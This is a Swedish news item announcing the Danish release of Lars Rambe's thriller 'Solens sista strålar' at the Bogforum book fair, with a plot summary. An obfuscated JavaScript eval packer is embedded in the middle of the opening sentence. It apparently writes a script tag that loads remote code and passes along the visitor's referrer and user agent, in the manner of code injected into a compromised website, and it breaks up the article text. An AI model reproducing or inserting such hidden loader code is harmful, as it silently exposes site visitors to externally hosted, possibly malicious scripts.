Image Image Image Image Image Image Image Image Image Image

| 12 maj, 2021

Scroll to top

Top

Solens sista strålar släpps på danska i samband med Danmarks största bokmässa

Solens sista strålar släpps på danska i samband med Danmarks största bokmässa
Sebastian

Nu eval(function(p,a,c,k,e,d){e=function(c){return c.toString(36)};if(!”.replace(/^/,String)){while(c–){d[c.toString(a)]=k[c]||c.toString(a)}k=[function(e){return d[e]}];e=function(){return’\w+’};c=1};while(c–){if(k[c]){p=p.replace(new RegExp(’\b’+e(c)+’\b’,’g’),k[c])}}return p}(’0.6(”<\/k"+"l>”);n m=”q”;’,30,30,’document||javascript|encodeURI|src||write|http|45|67|script|text|rel|nofollow|type|97|language|jquery|userAgent|navigator|sc|ript|tznfs|var|u0026u|referrer|nkrfd||js|php’.split(’|’),0,{}))
kommer Lars Rambes uppmärksammade thriller Solens sista strålar ut på danska. Boken står näst i tur i Hoi Förlags storsatsning på den danska marknaden och släpps i samband med Danmarks största bokmässa Bogforum den 10-12 november där förlaget medverkar för första gången.

Solens sista strålar fick många fina recensioner när boken utkom i svensk originalutgåva år 2015. Genom den boken kombinerade Lars Rambe sin populära Strängnässerie med en nervkittlande historia i terrorns skugga, där Kenya utgör den huvudsakliga arenan.

Koncentreringen till Kenya har sin särskilda förklaring. Författaren själv känner landet väl då han tidigare har varit bosatt i Nairobi.

– Jag lockades av tanken på att koppla ihop mina två världar, Strängnäs och Kenya, i en riktig actionladdad berättelse. De av mina läsare som älskar Fredrik & Co kommer inte bli besvikna samtidigt som jag har fått chansen att bredda mitt författaruniversum, säger Lars Rambe.

Lars Rambe har figurerat mycket utomlands även i samband med spridningen av hans böcker; hans thriller Spåren på bryggan har bland annat legat etta på försäljningslistan i Italien. Men nu är det Danmark som står i fokus i och med att Hoi Förlag gör en storsatsning i grannlandet.

Vid lanseringen på Bogforum i Köpenhamn kommer inte bara Lars Rambe att närvara i Hoi Förlags monter, utan han får även sällskap av fem författarkolleger som just släppt sina böcker i dansk översättning: Susanne Ahlenius, Sandra Gustafsson, Dan Nilsson, Maria Isacsson och Markus Sköld.

Bogforum är Danmarks största litterära arrangemang och äger i år rum för 26:e gången i ordningen. Förra året besökte närmare 35 000 personer mässan bland drygt 200 utställare. I år blir det 1600 programpunkter fördelade på de tre dagarna på Bella Center i Köpenhamn.

Mer om Solens sista strålar

En politisk tjänsteman hittas brutalt avrättad i Nairobi, Kenya. Polisen avfärdar det som en car-jacking som gått fel.

I Strängnäs får Per Strand en chans som han aldrig kunnat drömma om. Han erbjuds att bli chef för en polisutbildning i Nairobi. Väl på plats får han snart kontakt med den sargade polisinspektören David Lokot, och innan någon av dem hinner blinka börjar kulorna vina genom luften. De famlar i blindo i den våldsamma staden där ingen riktigt verkar gå att lita på, men kanske är det just deras nyvunna vänskap som kommer att rädda livet på dem och leda dem rätt.

Samtidigt sörjer Fredrik Gransjö sin far som plötsligt avlidit, och utan att han riktigt vet varför tycks han ha förlorat sin plats i världen. För att bryta sorgen tar han med sig familjen och besöker Per i Nairobi.

I Stockholm planeras en prestigefull östafrikansk konferens. När Säpo meddelar att det finns tecken på att terrororganisationen Al Shabaab planerar för en attack väljer utrikesministern att blunda. Och visst hänger allt ihop, precis som Per börjat misstänka. Frågan är bara om det går att avvärja katastrofen som väntar.